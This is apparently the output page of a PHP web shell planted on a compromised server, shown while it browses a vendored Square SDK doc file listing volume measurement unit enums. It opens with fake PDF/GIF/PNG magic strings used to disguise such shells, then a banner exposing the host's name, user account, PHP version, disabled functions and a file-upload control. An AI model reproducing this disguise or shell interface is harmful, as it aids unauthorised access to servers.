%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/vendor/square/square/doc/models/ |
Upload File : |
# Measurement Unit Volume The unit of volume used to measure a quantity. ## Enumeration `MeasurementUnitVolume` ## Fields | Name | Description | | --- | --- | | `GENERIC_FLUID_OUNCE` | The volume is measured in ounces. | | `GENERIC_SHOT` | The volume is measured in shots. | | `GENERIC_CUP` | The volume is measured in cups. | | `GENERIC_PINT` | The volume is measured in pints. | | `GENERIC_QUART` | The volume is measured in quarts. | | `GENERIC_GALLON` | The volume is measured in gallons. | | `IMPERIAL_CUBIC_INCH` | The volume is measured in cubic inches. | | `IMPERIAL_CUBIC_FOOT` | The volume is measured in cubic feet. | | `IMPERIAL_CUBIC_YARD` | The volume is measured in cubic yards. | | `METRIC_MILLILITER` | The volume is measured in metric milliliters. | | `METRIC_LITER` | The volume is measured in metric liters. |